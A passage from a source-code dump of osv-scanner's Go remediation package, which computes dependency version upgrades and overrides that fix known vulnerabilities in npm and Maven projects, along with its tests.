rv.IsDirect() } uniqueVulns[key] = d } } for _, d := range uniqueVulns { if d.dev { devCount++ } if d.direct { directCount++ } else { transitiveCount++ } } return VulnCount{ Unfixable: len(r.Unfixable), Dev: devCount, Direct: directCount, Transitive: transitiveCount, } } // ComputeInPlacePatches finds all possible targeting version changes that would fix vulnerabilities in a resolved graph. 
// TODO: Check for introduced vulnerabilities func ComputeInPlacePatches(ctx context.Context, cl client.ResolutionClient, graph *resolve.Graph, opts Options) (InPlaceResult, error) { res, err := inPlaceVulnsNodes(ctx, cl, graph) if err != nil { return InPlaceResult{}, err } // Compute the overall constraints imposed by the dependent packages on the vulnerable nodes vkDependentConstraint := make(map[resolve.VersionKey]semver.Set) for vk, vkVulns := range res.vkVulns { reqVers := make(map[string]struct{}) for _, vuln := range vkVulns { for _, sg := range vuln.Subgraphs { for _, e := range sg.Nodes[sg.Dependency].Parents { reqVers[e.Requirement] = struct{}{} } } } set, err := buildConstraintSet(vk.Semver(), slices.AppendSeq(make([]string, 0, len(reqVers)), maps.Keys(reqVers))) if err != nil { // TODO: log error? continue } vkDependentConstraint[vk] = set } var result InPlaceResult // TODO: This could be parallelized for vk, vulnList := range res.vkVulns { for _, vuln := range vulnList { if !opts.MatchVuln(vuln) { continue } // Consider vulns affecting packages we don't want to change unfixable if opts.UpgradeConfig.Get(vk.Name) == upgrade.None { result.Unfixable = append(result.Unfixable, vuln) continue } newVK, err := findFixedVersion(ctx, cl, vk.PackageKey, func(newVK resolve.VersionKey) bool { // Check if this is a disallowed version bump _, diff, err := vk.Semver().Difference(vk.Version, newVK.Version) if err != nil || !opts.UpgradeConfig.Get(vk.Name).Allows(diff) { return false } // Check if dependent packages are still satisfied by new version ok, err := vkDependentConstraint[vk].Match(newVK.Version) if err != nil || !ok { return false } // Check if new version's dependencies are satisfied by existing packages for _, nID := range res.vkNodes[vk] { ok, err := dependenciesSatisfied(ctx, cl, newVK, res.nodeDependencies[nID]) if err != nil || !ok { return false } } // Check if this version is vulnerable return !vulns.IsAffected(vuln.OSV, util.VKToPackageInfo(newVK)) 
}) if errors.Is(err, errInPlaceImpossible) { result.Unfixable = append(result.Unfixable, vuln) continue } else if err != nil { return InPlaceResult{}, err } dp := lf.DependencyPatch{ Pkg: vk.PackageKey, OrigVersion: vk.Version, NewVersion: newVK.Version, } idx := slices.IndexFunc(result.Patches, func(ipp InPlacePatch) bool { return ipp.DependencyPatch == dp }) if idx >= 0 { result.Patches[idx].ResolvedVulns = append(result.Patches[idx].ResolvedVulns, vuln) } else { result.Patches = append(result.Patches, InPlacePatch{ DependencyPatch: dp, ResolvedVulns: []resolution.Vulnerability{vuln}, }) } } } // Sort patches for priority/consistency slices.SortFunc(result.Patches, func(a, b InPlacePatch) int { // Number of vulns fixed descending if c := cmp.Compare(len(a.ResolvedVulns), len(b.ResolvedVulns)); c != 0 { return -c } // Package name ascending if c := cmp.Compare(a.Pkg.Name, b.Pkg.Name); c != 0 { return c } // Original version ascending if c := cmp.Compare(a.OrigVersion, b.OrigVersion); c != 0 { return c } // New version descending return -cmp.Compare(a.NewVersion, b.NewVersion) }) return result, nil } var errInPlaceImpossible = errors.New("cannot find a version satisfying in-place constraints") func findFixedVersion(ctx context.Context, cl client.DependencyClient, pk resolve.PackageKey, satifyFn func(resolve.VersionKey) bool) (resolve.VersionKey, error) { vers, err := cl.Versions(ctx, pk) if err != nil { return resolve.VersionKey{}, err } // Make sure versions are sorted, then iterate over versions from latest to earliest looking for a satisfying version slices.SortFunc(vers, func(a, b resolve.Version) int { return a.Semver().Compare(a.Version, b.Version) }) for i := len(vers) - 1; i >= 0; i-- { vk := vers[i].VersionKey if vk.VersionType == resolve.Concrete && satifyFn(vk) { return vk, nil } } return resolve.VersionKey{}, errInPlaceImpossible } type inPlaceVulnsNodesResult struct { nodeDependencies map[resolve.NodeID][]resolve.VersionKey vkVulns 
map[resolve.VersionKey][]resolution.Vulnerability vkNodes map[resolve.VersionKey][]resolve.NodeID } func inPlaceVulnsNodes(ctx context.Context, m clientinterfaces.VulnerabilityMatcher, graph *resolve.Graph) (inPlaceVulnsNodesResult, error) { nodeVulns, err := m.MatchVulnerabilities(ctx, client.GraphToInventory(graph)) if err != nil { return inPlaceVulnsNodesResult{}, err } // GraphToInventory/MatchVulnerabilities excludes the root node of the graph. // Prepend an element to nodeVulns so that the indices line up with graph.Nodes[i] <=> nodeVulns[i] nodeVulns = append([][]*osvschema.Vulnerability{nil}, nodeVulns...) result := inPlaceVulnsNodesResult{ nodeDependencies: make(map[resolve.NodeID][]resolve.VersionKey), vkVulns: make(map[resolve.VersionKey][]resolution.Vulnerability), vkNodes: make(map[resolve.VersionKey][]resolve.NodeID), } // Find all direct dependencies of vulnerable nodes. for _, e := range graph.Edges { if len(nodeVulns[e.From]) > 0 { result.nodeDependencies[e.From] = append(result.nodeDependencies[e.From], graph.Nodes[e.To].Version) } } // Construct resolution.Vulnerability for all vulnerable packages // combining nodes with the same package & versions number var nodeIDs []resolve.NodeID for nID, nVulns := range nodeVulns { if len(nVulns) > 0 { nodeIDs = append(nodeIDs, resolve.NodeID(nID)) } } nodeSubgraphs := resolution.ComputeSubgraphs(graph, nodeIDs) for i, nID := range nodeIDs { vk := graph.Nodes[nID].Version result.vkNodes[vk] = append(result.vkNodes[vk], nID) for _, vuln := range nodeVulns[nID] { resVuln := resolution.Vulnerability{ OSV: vuln, Subgraphs: []*resolution.DependencySubgraph{nodeSubgraphs[i]}, DevOnly: nodeSubgraphs[i].IsDevOnly(nil), } idx := slices.IndexFunc(result.vkVulns[vk], func(rv resolution.Vulnerability) bool { return rv.OSV.GetId() == resVuln.OSV.GetId() }) if idx >= 0 { result.vkVulns[vk][idx].DevOnly = result.vkVulns[vk][idx].DevOnly && resVuln.DevOnly result.vkVulns[vk][idx].Subgraphs = 
append(result.vkVulns[vk][idx].Subgraphs, resVuln.Subgraphs...) } else { result.vkVulns[vk] = append(result.vkVulns[vk], resVuln) } } } return result, nil } func buildConstraintSet(sys semver.System, requiredVers []string) (semver.Set, error) { // combine a list of requirement strings into one semver.Set to allow version matching v := requiredVers[0] // 'latest' is effectively meaningless in a lockfile, since what 'latest' is could have changed between locking // TODO: other tags e.g. "next", "old" (?) // TODO: non-npm ecosystems if v == "latest" { v = "*" } c, err := sys.ParseConstraint(v) if err != nil { return semver.Set{}, err } cSet := c.Set() for _, req := range requiredVers[1:] { if req == "latest" { req = "*" } c, err := sys.ParseConstraint(req) if err != nil { return semver.Set{}, err } if err := cSet.Intersect(c.Set()); err != nil { return semver.Set{}, err } } return cSet, nil } func dependenciesSatisfied(ctx context.Context, cl client.DependencyClient, vk resolve.VersionKey, children []resolve.VersionKey) (bool, error) { var deps []resolve.VersionKey var optDeps []resolve.VersionKey reqs, err := cl.Requirements(ctx, vk) if err != nil { return false, err } for _, v := range reqs { if v.Type.IsRegular() { deps = append(deps, v.VersionKey) } else if v.Type.HasAttr(dep.Opt) { optDeps = append(optDeps, v.VersionKey) } } // TODO: correctly handle other attrs e.g. 
npm peerDependencies // remove the optional deps from the regular deps (because they can show up in both) if they're not already installed for _, optVk := range optDeps { if !slices.ContainsFunc(children, func(vk resolve.VersionKey) bool { return vk.Name == optVk.Name }) { idx := slices.IndexFunc(deps, func(vk resolve.VersionKey) bool { return vk.Name == optVk.Name }) if idx >= 0 { deps = slices.Delete(deps, idx, idx+1) } } } for _, depVK := range deps { ver := depVK.Version // 'latest' is effectively meaningless in a lockfile, since what 'latest' is could have changed between locking // TODO: Support other tags e.g. "next", "old" & non-npm ecosystems if ver == "latest" { ver = "*" } constr, err := vk.Semver().ParseConstraint(ver) if err != nil { return false, err } // check if any of the current children satisfy this import ok := false for _, child := range children { if child.Name == depVK.Name && constr.Match(child.Version) { ok = true break } } if !ok { return false, nil } } return true, nil } ================================================ FILE: internal/remediation/in_place_test.go ================================================ package remediation_test import ( "cmp" "maps" "slices" "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/clienttest" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/testutility" ) func parseInPlaceFixture(t *testing.T, universePath, vulnPath, lockfilePath string) (*resolve.Graph, client.ResolutionClient) { t.Helper() rw, err := lockfile.GetReadWriter(lockfilePath) if err != nil { t.Fatalf("Failed to get ReadWriter: %v", err) } f, err := 
depfile.OpenLocalDepFile(lockfilePath) if err != nil { t.Fatalf("Failed to open lockfile: %v", err) } defer f.Close() g, err := rw.Read(f) if err != nil { t.Fatalf("Failed to parse lockfile: %v", err) } return g, clienttest.NewMockResolutionClient(t, universePath, vulnPath) } func checkInPlaceResults(t *testing.T, res remediation.InPlaceResult) { // InPlaceResult is too large when dumped as JSON. // Extract & compare a subset of fields that are relevant for the tests. t.Helper() type minimalVuln struct { ID string AffectedNodes []resolve.NodeID } toMinimalVuln := func(v resolution.Vulnerability) minimalVuln { t.Helper() nodes := make(map[resolve.NodeID]struct{}) for _, sg := range v.Subgraphs { nodes[sg.Dependency] = struct{}{} } sortedNodes := slices.AppendSeq(make([]resolve.NodeID, 0, len(nodes)), maps.Keys(nodes)) slices.Sort(sortedNodes) return minimalVuln{ ID: v.OSV.GetId(), AffectedNodes: sortedNodes, } } type minimalPatch struct { Patch lockfile.DependencyPatch Resolved []minimalVuln } type minimalResult struct { Patches []minimalPatch Unfixable []minimalVuln } minimalRes := minimalResult{ Patches: make([]minimalPatch, len(res.Patches)), Unfixable: make([]minimalVuln, len(res.Unfixable)), } for i, p := range res.Patches { minimalRes.Patches[i].Patch = p.DependencyPatch resolved := make([]minimalVuln, len(p.ResolvedVulns)) for j, v := range p.ResolvedVulns { resolved[j] = toMinimalVuln(v) } minimalRes.Patches[i].Resolved = resolved } for i, v := range res.Unfixable { minimalRes.Unfixable[i] = toMinimalVuln(v) } // make sure the unfixable vulns are in a stable order slices.SortFunc(minimalRes.Unfixable, func(a, b minimalVuln) int { if c := cmp.Compare(a.ID, b.ID); c != 0 { return c } return slices.Compare(a.AffectedNodes, b.AffectedNodes) }) testutility.NewSnapshot().MatchJSON(t, minimalRes) } func TestComputeInPlacePatches(t *testing.T) { t.Parallel() basicOpts := remediation.Options{ DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), } tests := 
[]struct { name string universePath string vulnPath string lockfilePath string opts remediation.Options }{ { name: "npm-santatracker", universePath: "./testdata/santatracker/universe.yaml", vulnPath: "./testdata/santatracker/vulns.json", lockfilePath: "./testdata/santatracker/package-lock.json", opts: basicOpts, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() g, cl := parseInPlaceFixture(t, tt.universePath, tt.vulnPath, tt.lockfilePath) res, err := remediation.ComputeInPlacePatches(t.Context(), cl, g, tt.opts) if err != nil { t.Fatalf("Failed to compute in-place patches: %v", err) } checkInPlaceResults(t, res) }) } } ================================================ FILE: internal/remediation/override.go ================================================ package remediation import ( "context" "errors" "fmt" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/resolution/util" "github.com/google/osv-scanner/v2/internal/utility/maven" "github.com/google/osv-scanner/v2/internal/utility/vulns" ) type overridePatch struct { resolve.PackageKey OrigVersion string NewVersion string } // ComputeOverridePatches attempts to resolve each vulnerability found in result independently, returning the list of unique possible patches. // Vulnerabilities are resolved by directly overriding versions of vulnerable packages to non-vulnerable versions. // If a patch introduces new vulnerabilities, additional overrides are attempted for the new vulnerabilities. 
//
// The result passed in is filtered with opts.MatchVuln before any work starts, so the caller's
// value is what gets filtered. One override attempt is then started per remaining vulnerability.
//
// The error returned by the visible code is always nil: an attempt that fails, whether with
// errOverrideImpossible or with any other error, is dropped. An empty or short slice therefore
// does not distinguish "nothing needed fixing" from "every attempt failed".
// NOTE(review): presumably this also hides context cancellation surfaced by cl - confirm.
//
// A Difference whose AddedVulns is non-empty stays in the returned slice even when a follow-up
// attempt is started for those vulnerabilities, so callers should inspect AddedVulns before
// applying a patch.
func ComputeOverridePatches(ctx context.Context, cl client.ResolutionClient, result *resolution.Result, opts Options) ([]resolution.Difference, error) {
	// TODO: this is very similar to ComputeRelaxPatches - can the common parts be factored out?
	// Filter the original result just in case it hasn't been already
	result.FilterVulns(opts.MatchVuln)

	// Do the resolutions concurrently
	// overrideResult carries the outcome of one attempt back to the collecting loop below.
	type overrideResult struct {
		vulnIDs []string
		result  *resolution.Result
		patches []overridePatch
		err     error
	}
	// ch is unbuffered: each doOverride goroutine blocks on its send until the loop below receives it.
	ch := make(chan overrideResult)
	doOverride := func(vulnIDs []string) {
		// Every attempt starts from the same original result captured by this closure.
		res, patches, err := overridePatchVulns(ctx, cl, result, vulnIDs, opts)
		if err == nil {
			res.FilterVulns(opts.MatchVuln)
		}
		ch <- overrideResult{
			vulnIDs: vulnIDs,
			result:  res,
			patches: patches,
			err:     err,
		}
	}

	// toProcess counts attempts that have been started but whose result has not been received yet.
	toProcess := 0
	for _, v := range result.Vulns {
		// TODO: limit the number of goroutines
		go doOverride([]string{v.OSV.GetId()})
		toProcess++
	}

	var allResults []resolution.Difference
	for toProcess > 0 {
		res := <-ch
		toProcess--
		if errors.Is(res.err, errOverrideImpossible) {
			continue
		}

		if res.err != nil {
			// Resolution errors seem to happen when a package/version cannot be found, which isn't uncommon.
			// Just silently skip for now, treating it the same as unfixable.
			// TODO: Log the error somehow.
			continue
		}

		diff := result.CalculateDiff(res.result)

		// CalculateDiff does not compute override manifest patches correctly, manually fill it out.
		// TODO: CalculateDiff maybe should not be reconstructing patches.
		// Refactor CalculateDiff, Relaxer, Override to make patches in a more sane way.
		diff.Deps = make([]manifest.DependencyPatch, len(res.patches))
		for i, p := range res.patches {
			diff.Deps[i] = manifest.DependencyPatch{
				Pkg:          p.PackageKey,
				Type:         dep.Type{},
				OrigRequire:  "", // Using empty original to signal this is an override patch
				OrigResolved: p.OrigVersion,
				NewRequire:   p.NewVersion,
				NewResolved:  p.NewVersion,
			}
		}

		// The diff is recorded as-is, including any vulnerabilities it introduces.
		allResults = append(allResults, diff)

		// If there are any new vulns, try override them as well
		var newlyAdded []string
		for _, v := range diff.AddedVulns {
			if !slices.Contains(res.vulnIDs, v.OSV.GetId()) {
				newlyAdded = append(newlyAdded, v.OSV.GetId())
			}
		}

		if len(newlyAdded) > 0 {
			// The follow-up attempt targets the IDs of this attempt plus the newly introduced ones.
			go doOverride(append(res.vulnIDs, newlyAdded...)) // No need to clone res.vulnIDs here
			toProcess++
		}
	}

	// Sort and remove duplicate patches
	slices.SortFunc(allResults, func(a, b resolution.Difference) int { return a.Compare(b) })
	allResults = slices.CompactFunc(allResults, func(a, b resolution.Difference) bool { return a.Compare(b) == 0 })

	return allResults, nil
}

// errOverrideImpossible is returned by overridePatchVulns when no override patch could be produced.
var errOverrideImpossible = errors.New("cannot fix vulns by overrides")

// overridePatchVulns tries to fix as many vulns in vulnIDs as possible by overriding dependency versions.
// It returns errOverrideImpossible if 0 vulns are patchable, otherwise it returns the most possible patches.
//
// Each pass of the loop groups the targeted vulns by affected VersionKey, picks an override
// version per VersionKey, patches the manifest and re-resolves it. The loop ends when no targeted
// vuln remains or when no further patch can be found. The returned result is the last successful
// resolution, so it may still contain some of the vulns in vulnIDs.
//
// The whole attempt is abandoned with errOverrideImpossible as soon as one affected node is
// required through an edge carrying a Maven classifier or artifact type.
//
// In the visible code the result passed in is only read (result.Vulns, result.Manifest), and the
// local variable is rebound to the re-resolved result.
func overridePatchVulns(ctx context.Context, cl client.ResolutionClient, result *resolution.Result, vulnIDs []string, opts Options) (*resolution.Result, []overridePatch, error) {
	// effectivePatches accumulates, per package, the override from the original version to the latest chosen one.
	var effectivePatches []overridePatch
	for {
		// Find the relevant vulns affecting each version key.
		vkVulns := make(map[resolve.VersionKey][]*resolution.Vulnerability)
		for i, v := range result.Vulns {
			if !slices.Contains(vulnIDs, v.OSV.GetId()) {
				continue
			}
			// Keep track of VersionKeys we've seen for this vuln to avoid duplicates.
			// Usually, there will only be one VersionKey per vuln, but some vulns affect multiple packages.
			seenVKs := make(map[resolve.VersionKey]struct{})
			// Use the Subgraphs to find all the affected nodes.
			for _, sg := range v.Subgraphs {
				for _, e := range sg.Nodes[sg.Dependency].Parents {
					// Currently, there is no way to know if a specific classifier or type exists for a given version with deps.dev.
					// Blindly updating versions can lead to compilation failures if the artifact+version+classifier+type doesn't exist.
					// We can't reliably attempt remediation in these cases, so don't try.
					if e.Type.HasAttr(dep.MavenClassifier) || e.Type.HasAttr(dep.MavenArtifactType) {
						return nil, nil, fmt.Errorf("%w: cannot fix vulns in artifacts with classifier or type", errOverrideImpossible)
					}
					vk := sg.Nodes[sg.Dependency].Version
					if _, seen := seenVKs[vk]; !seen {
						vkVulns[vk] = append(vkVulns[vk], &result.Vulns[i])
						seenVKs[vk] = struct{}{}
					}
				}
			}
		}

		if len(vkVulns) == 0 {
			// All vulns have been fixed.
			break
		}

		newPatches := make([]overridePatch, 0, len(vkVulns))

		// For each VersionKey, try fix as many of the vulns affecting it as possible.
		for vk, vulnerabilities := range vkVulns {
			// Consider vulns affecting packages we don't want to change unfixable
			if opts.UpgradeConfig.Get(vk.Name) == upgrade.None {
				continue
			}

			bestVK := vk
			bestCount := len(vulnerabilities) // remaining vulns
			versions, err := getVersionsGreater(ctx, cl, vk)
			if err != nil {
				return nil, nil, err
			}

			// Find the minimal greater version that fixes as many vulnerabilities as possible.
			// Only the vulns already known to affect vk are counted here; anything a candidate
			// version newly introduces is not part of this selection.
			for _, ver := range versions {
				// Break if we've encountered a disallowed version update.
				// NOTE(review): the error from Difference is discarded here, whereas
				// ComputeInPlacePatches rejects the candidate when Difference fails - confirm
				// that an unparsable version should be judged on the returned diff alone.
				if _, diff, _ := vk.System.Semver().Difference(vk.Version, ver.Version); !opts.UpgradeConfig.Get(vk.Name).Allows(diff) {
					break
				}

				// Count the remaining known vulns that affect this version.
				count := 0 // remaining vulns
				for _, rv := range vulnerabilities {
					if vulns.IsAffected(rv.OSV, util.VKToPackageInfo(ver.VersionKey)) {
						count++
					}
				}

				// The strict comparison keeps the earliest version in iteration order among equally good candidates.
				if count < bestCount {
					// Found a new candidate.
					bestCount = count
					bestVK = ver.VersionKey

					if bestCount == 0 { // stop if there are 0 vulns remaining
						break
					}
				}
			}

			if bestCount < len(vulnerabilities) {
				// Found a version that fixes some vulns.
				newPatches = append(newPatches, overridePatch{
					PackageKey:  vk.PackageKey,
					OrigVersion: vk.Version,
					NewVersion:  bestVK.Version,
				})
			}
		}

		// No VersionKey could be improved in this pass; keep whatever earlier passes achieved.
		if len(newPatches) == 0 {
			break
		}

		// Patch and re-resolve manifest
		newManif, err := patchManifest(newPatches, result.Manifest)
		if err != nil {
			return nil, nil, err
		}

		result, err = resolution.Resolve(ctx, cl, newManif, opts.ResolveOpts)
		if err != nil {
			return nil, nil, err
		}

		result.FilterVulns(opts.MatchVuln)

		// If the patch applies to a package that was already patched before, update the effective patch.
		// A new patch continues an earlier one when it starts from the version that earlier patch moved to.
		for _, p := range newPatches {
			idx := slices.IndexFunc(effectivePatches, func(op overridePatch) bool {
				return op.PackageKey == p.PackageKey && op.NewVersion == p.OrigVersion
			})
			if idx == -1 {
				effectivePatches = append(effectivePatches, p)
			} else {
				effectivePatches[idx].NewVersion = p.NewVersion
			}
		}
	}

	if len(effectivePatches) == 0 {
		return nil, nil, errOverrideImpossible
	}

	// Sort the patches for deterministic output.
	// Order is by package key first, then by original version.
	slices.SortFunc(effectivePatches, func(a, b overridePatch) int {
		if c := a.Compare(b.PackageKey); c != 0 {
			return c
		}

		return a.Semver().Compare(a.OrigVersion, b.OrigVersion)
	})

	return result, effectivePatches, nil
}

// NOTE(review): in getVersionsGreater, the Warnf call on a Maven parse failure formats `parsed`
// (the result of the failed semver.Maven.Parse) rather than ver.Version, so the log line does not
// show which version string was rejected.

// getVersionsGreater gets the known versions of a package that are greater than the given version, sorted in ascending order.
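func getVersionsGreater(ctx context.Context, cl client.DependencyClient, vk resolve.VersionKey) ([]resolve.Version, error) {
	// Returns the versions reported by cl.Versions for vk's package that sort
	// after vk, in ascending order. A client error is returned unchanged.

	// Get & sort all the valid versions of this package
	// TODO: (Maven) skip unlisted versions and versions on other registries
	versions, err := cl.Versions(ctx, vk.PackageKey)
	if err != nil {
		return nil, err
	}

	// Pre-parse each version once so the comparator can look it up by key.
	semvers := make(map[resolve.VersionKey]*semver.Version)
	for _, ver := range versions {
		parsed, err := semver.Maven.Parse(ver.Version)
		if err != nil {
			// Log the raw version string that failed to parse. The previous code
			// logged `parsed`, which is not a usable value when Parse fails, so
			// the warning never named the offending version.
			cmdlogger.Warnf("parsing Maven version %s: %v", ver.Version, err)
			continue
		}
		semvers[ver.VersionKey] = parsed
	}

	// NOTE(review): versions that failed to parse stay in `versions` and are
	// compared through a missing (nil) map entry, as is vk itself when it is not
	// among the returned versions - confirm maven.CompareVersions tolerates nil.
	cmpFunc := func(a, b resolve.Version) int {
		if vk.System == resolve.Maven {
			return maven.CompareVersions(vk, semvers[a.VersionKey], semvers[b.VersionKey])
		}

		return vk.Semver().Compare(a.Version, b.Version)
	}
	slices.SortFunc(versions, cmpFunc)

	// Find the index of the next higher version
	offset, vkFound := slices.BinarySearchFunc(versions, resolve.Version{VersionKey: vk}, cmpFunc)
	if vkFound { // if the given version somehow doesn't exist, offset will already be at the next higher version
		offset++
	}

	return versions[offset:], nil
}

// patchManifest applies the overridePatches to the manifest in-memory. Returns a copy of the manifest that has been patched.
func patchManifest(patches []overridePatch, m manifest.Manifest) (manifest.Manifest, error) {
	if m.System() != resolve.Maven {
		return manifest.Manifest{}, errors.New("unsupported ecosystem")
	}

	// TODO: The overridePatch does not have an artifact's type or classifier, which is part of what uniquely identifies them.
	// This needs to be part of the comparison & added to dependency management for it to override packages that specify them.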
patched := m.Clone() for _, p := range patches { found := false i := 0 for _, r := range patched.Requirements { if r.PackageKey != p.PackageKey { patched.Requirements[i] = r i++ continue } origin, hasOrigin := r.Type.GetAttr(dep.MavenDependencyOrigin) if !hasOrigin || origin == maven.OriginManagement { found = true r.Version = p.NewVersion patched.Requirements[i] = r i++ } } patched.Requirements = patched.Requirements[:i] if !found { newReq := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: p.PackageKey, Version: p.NewVersion, VersionType: resolve.Requirement, }, } newReq.Type.AddAttr(dep.MavenDependencyOrigin, maven.OriginManagement) patched.Requirements = append(patched.Requirements, newReq) } } return patched, nil } ================================================ FILE: internal/remediation/override_test.go ================================================ package remediation_test import ( "testing" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" ) func TestComputeOverridePatches(t *testing.T) { t.Parallel() basicOpts := remediation.Options{ DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), } tests := []struct { name string universePath string vulnPath string manifestPath string opts remediation.Options }{ { name: "maven-zeppelin-server", universePath: "./testdata/zeppelin-server/universe.yaml", vulnPath: "./testdata/zeppelin-server/vulns.json", manifestPath: "./testdata/zeppelin-server/pom.xml", opts: basicOpts, }, { name: "maven-classifier", universePath: "./testdata/maven-classifier/universe.yaml", vulnPath: "./testdata/maven-classifier/vulns.json", manifestPath: "./testdata/maven-classifier/pom.xml", opts: basicOpts, }, { name: "maven-management-only", universePath: "./testdata/zeppelin-server/universe.yaml", vulnPath: "./testdata/zeppelin-server/vulns.json", manifestPath: 
"./testdata/zeppelin-server/parent/pom.xml", opts: remediation.Options{ ResolveOpts: resolution.ResolveOpts{ MavenManagement: true, }, DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), }, }, { name: "workaround-maven-guava-none-to-jre", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/guava/none-to-jre/pom.xml", opts: basicOpts, }, { name: "workaround-maven-guava-jre-to-jre", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/guava/jre-to-jre/pom.xml", opts: basicOpts, }, { name: "workaround-maven-guava-android-to-android", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/guava/android-to-android/pom.xml", opts: basicOpts, }, { name: "workaround-commons", universePath: "./testdata/override-workaround/universe.yaml", vulnPath: "./testdata/override-workaround/vulns.json", manifestPath: "./testdata/override-workaround/commons/pom.xml", opts: basicOpts, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() res, cl := parseRemediationFixture(t, tt.universePath, tt.vulnPath, tt.manifestPath, tt.opts.ResolveOpts) res.FilterVulns(tt.opts.MatchVuln) p, err := remediation.ComputeOverridePatches(t.Context(), cl, res, tt.opts) if err != nil { t.Fatalf("Failed to compute override patches: %v", err) } checkRemediationResults(t, p) }) } } ================================================ FILE: internal/remediation/relax/npm.go ================================================ package relax import ( "context" "slices" "deps.dev/util/resolve" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) type NpmRelaxer struct{} func (r NpmRelaxer) Relax(ctx context.Context, cl 
resolve.Client, req resolve.RequirementVersion, config upgrade.Config) (resolve.RequirementVersion, bool) { configLevel := config.Get(req.Name) if configLevel == upgrade.None { return req, false } c, err := semver.NPM.ParseConstraint(req.Version) if err != nil { // The specified version is not a valid semver constraint // Check if it's a version tag (usually 'latest') by seeing if there are matching versions vks, err := cl.MatchingVersions(ctx, req.VersionKey) if err != nil || len(vks) == 0 { // no matches, cannot relax return req, false } // Use the first matching version (there should only be one) as a pinned version c, err = semver.NPM.ParseConstraint(vks[0].Version) if err != nil { return req, false } } // Get all the concrete versions of the package allVKs, err := cl.Versions(ctx, req.PackageKey) if err != nil { return req, false } var vers []string for _, vk := range allVKs { if vk.VersionType == resolve.Concrete { vers = append(vers, vk.Version) } } slices.SortFunc(vers, semver.NPM.Compare) // Find the versions on either side of the upper boundary of the requirement var lastIdx int // highest version matching constraint nextIdx := -1 // next version outside of range, preferring non-prerelease nextIsPre := true // if the next version is a prerelease version for lastIdx = len(vers) - 1; lastIdx >= 0; lastIdx-- { v, err := semver.NPM.Parse(vers[lastIdx]) if err != nil { continue } if c.MatchVersion(v) { // found the upper bound, stop iterating break } // Want to prefer non-prerelease versions, so only select one if we haven't seen any non-prerelease versions if !v.IsPrerelease() || nextIsPre { nextIdx = lastIdx nextIsPre = v.IsPrerelease() } } // Didn't find any higher versions of the package if nextIdx == -1 { return req, false } // No versions match the existing constraint, something is wrong if lastIdx == -1 { return req, false } // Our desired relaxation ordering is // 1.2.3 -> 1.2.* -> 1.*.* -> 2.*.* -> 3.*.* -> ... 
// But we want to use npm-like version specifiers e.g. // 1.2.3 -> ~1.2.4 -> ^1.4.5 -> ^2.6.7 -> ^3.8.9 -> ... // using the latest versions of the ranges cmpVer := vers[lastIdx] _, diff, _ := semver.NPM.Difference(cmpVer, vers[nextIdx]) if !configLevel.Allows(diff) { return req, false } if diff == semver.DiffMajor { // Want to step only one major version at a time // Instead of looking for a difference larger than major, // we want to look for a major version bump from the first next version cmpVer = vers[nextIdx] diff = semver.DiffMinor } // Find the highest version with the same difference best := vers[nextIdx] for i := nextIdx + 1; i < len(vers); i++ { _, d, err := semver.NPM.Difference(cmpVer, vers[i]) if err != nil { continue } // If we've exceeded our allowed upgrade level, stop looking. if !configLevel.Allows(d) { break } // DiffMajor < DiffMinor < DiffPatch < DiffPrerelease // So if d is less than the original diff, it represents a larger change if d < diff { break } ver, err := semver.NPM.Parse(vers[i]) if err != nil { continue } if !ver.IsPrerelease() || nextIsPre { best = vers[i] } } if diff == semver.DiffPatch { req.Version = "~" + best } else { req.Version = "^" + best } return req, true } ================================================ FILE: internal/remediation/relax/npm_test.go ================================================ package relax_test import ( "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation/relax" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) func TestRelaxNpm(t *testing.T) { t.Parallel() type result struct { version string ok bool } tests := []struct { name string versions []string from string upgradeConfig upgrade.Config want result }{ { name: "pinned-to-patch", versions: []string{"1.2.3", "1.2.4", "1.2.5", "1.3.0", "2.0.0"}, from: "1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: "~1.2.5", ok: true, }, }, { name: "patch-to-minor", versions: 
